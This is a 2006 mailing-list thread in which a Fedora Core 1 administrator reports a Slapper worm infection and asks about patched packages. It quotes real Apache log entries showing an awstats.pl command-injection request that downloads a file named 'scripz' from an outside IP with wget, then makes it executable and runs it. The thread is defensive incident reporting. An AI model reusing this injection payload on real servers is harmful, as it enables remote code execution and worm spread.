slapper worm
Michael Mansour
mic at npgx.com.au
Mon Jan 23 21:06:44 UTC 2006
Hi James,
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Michael Mansour wrote:
> > Hi guys,
> >
> > I have an FC1 machine which got infected twice with the slapper worm, and then
> > started DOS attacking a large vendor.
> >
> > I've stopped slapper in its tracks with a couple of changes to FC1, but in
> > analysing now how it got in (it seems to use SSLv2 vulerabilities in an apache
> > SSL server which I've now turned off), I see the following bit of interest in
> > my apache access_log:
> >
> > 220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] "GET
> > /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
> >
mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
> > HTTP/1.1"
> > 403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
> > 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET
> > /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
> >
mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
> > HTTP/1.1"
> > 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
> >
> > These "scripz" files end up going into /tmp, being compiled with gcc, renamed
> > to "httpd" and run as that.
> >
> > I'm using:
> >
> > perl-5.8.3-17.4.legacy
> > httpd-2.0.51-1.9.legacy
> > openssl-0.9.7a-33.13.legacy
> >
> > Are there any updates FL can do to any of the packages to fix/block slapper
> > from an FC1 machine?
> >
> > Michael.
> >
>
> Michael,
>
> Try my version of httpd here:
> http://support.intcomgrp.com/~jkosin
>
> It has been effective against the worm so far.
Thanks, I will actually try them out today.
Have you considered making a yum/apt repo for your packages? it'll make it
much easier to yum to newer releases when you have them, and it's quite easy
to make a yum/apt repo.
Michael.
More information about the fedora-legacy-list
mailing list